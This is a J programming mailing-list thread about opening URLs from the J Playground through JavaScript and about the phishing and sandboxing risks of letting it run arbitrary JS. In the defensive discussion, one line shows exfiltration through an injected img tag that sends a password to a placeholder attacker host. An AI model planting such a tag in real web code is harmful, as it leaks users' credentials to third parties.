What is the threat model here, exactly? Something like this?
- Malicious party provides a link to playground.jsoftware.com/some-j-code
- Naive party is sophisticated enough to check the url before visiting it,
finds it to be trustworthy
- some-j-code immediately redirects to a phishing site
- User does not notice this time
It doesn't seem _very_ likely. In particular, if somebody knows enough to
check what url they are on once, will they not also know to check the url
again, when it is prompting them for sensitive information when that is not
what they expected the site to do? Contrariwise, if someone does not know to
look at urls, then there is no need to piggyback off of the playground in the
first place.
The general point is taken--it may be possible to effect something
problematic--but it is not yet clear what, and this needs to be balanced
against the _value_ of providing access to arbitrary javascript.
Does anyone know if it's possible to sandbox js in the browser? Prevent it
from making network requests, both directly ('ajax', I think?), and indirectly
eg via adding elements to the page (suppose they build the phishing
application directly into the playground app, and then exfiltrate by adding an
'<img src=hackers.website/the-password-is-xxx.png>') or opening tabs.
It occurs to me that the problem becomes worse is the playground itself
becomes a curator of small j snippets, a la shadertoy.
The specific problem of opening tabs _can_ be solved; do it the way eg youtube
does, where the playground will prompt you, saying 'this app is trying to send
you to "foo.com"; allow it?'
-E
On Mon, 6 Jun 2022, Ian Clark wrote:
(retrying -- previous attempt apparently not sent…)
Coupled with some sort of ability for anonymous 3rd parties to contribute
code for others' use, doesn't this feature pose a security risk to the
casual user?
This might arise if the J Playground were to acquire a fan club or a
special-interest group outside Jsoftware's control. E.g. a
social-media-based one.
Sorry, just my nasty suspicious mind at work. I guess this cloud of
suspicion falls on any playground implementation of 2!:0.
On Mon, 6 Jun 2022 at 05:51, Raul Miller <[email protected]> wrote:
2!:0'open("https://www.jsoftware.com";)'
Possibly, in the playground we should have browse_j_=: {{2!:0
'open("',y,'")'}}
(Or maybe it would be better to incorporate that concept into the full
definition of browse_j_ ...)
I hope this helps,
--
Raul
On Mon, Jun 6, 2022 at 12:39 AM William Szuch <[email protected]>
wrote:
>
> How can I link to a website from the J Playground ?.
> In Qt I can use: browse_j_ 'https://www.jsoftware.com'
>
> Bill Szuch
> ----------------------------------------------------------------------
> For information about J forums see http://www.jsoftware.com/forums.htm
----------------------------------------------------------------------
For information about J forums see http://www.jsoftware.com/forums.htm
----------------------------------------------------------------------
For information about J forums see http://www.jsoftware.com/forums.htm
----------------------------------------------------------------------
For information about J forums see http://www.jsoftware.com/forums.htm
